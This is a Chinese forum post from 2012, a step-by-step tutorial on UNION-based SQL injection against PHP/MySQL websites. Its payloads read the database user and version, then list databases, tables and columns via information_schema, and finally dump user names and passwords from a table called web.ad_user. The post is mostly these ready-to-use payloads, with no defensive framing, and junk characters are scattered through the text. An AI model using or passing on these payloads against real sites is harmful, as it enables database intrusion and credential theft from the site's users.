" ~% z' H( n; i. z4 d) g+ |教程内容:Mysql 5+php 注入* D, l$ s: ]0 b1 r
7 M2 } m; E& v% X* u8 v! {( ]# M! K( q }
, x% C0 ?: i* f& J5 \7 X" E, s; g% ^4 Y* i一.查看MYSQL基本信息(库名,版本,用户)( V$ w# E3 L. V }
* Q7 A3 b( g$ M) C8 H) ]9 P
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
% d# ^* e2 d; B$ P2 a
: b1 i, J3 H, d" ]; }: j' i8 W二.查数据库4 u$ Q2 Z2 L2 e/ V: [, [+ x
5 _1 F. a$ R2 A. G( \0 t$ @and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*$ T u% q1 }9 r# R+ x
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
8 E; \$ m! Z6 u, u5 G7 w6 v5 T# q% M- v6 S
三.暴表
) f4 l6 @4 h6 d) s; P: { H
. R. f) x( S7 s R0 J& Pand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*. o: l( c+ _# |* |1 m T5 ~" f
6 }$ K; T/ S% t9 X# Wlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。( u# k9 W" X2 U6 x3 j
/ {; [ E. O7 q& R; F( E0 h( [) |
四.暴字段
6 q8 x& o3 N4 u; t5 M
0 W J3 O$ D$ ]7 tand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
' [( a- c, G9 n% ~& C9 R% B# m2 L/ `( f( Q" P$ \: p
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。: ]# C& Q1 v5 _( U. L4 e
7 I1 F G- J" J$ F4 ^. V! S7 P8 ?五.暴数据) ~! k; V/ y2 e) d4 Z
/ ]/ l& T! a- ^& Aand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
2 W3 t9 K/ g( r; r' u
9 U/ s) Y' F& e# s& |( z
0 y9 Y: W/ C2 @% g这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。( U; |5 z$ q4 O$ Q
|
发表于 2012-9-13 16:27:53
收藏
支持
反对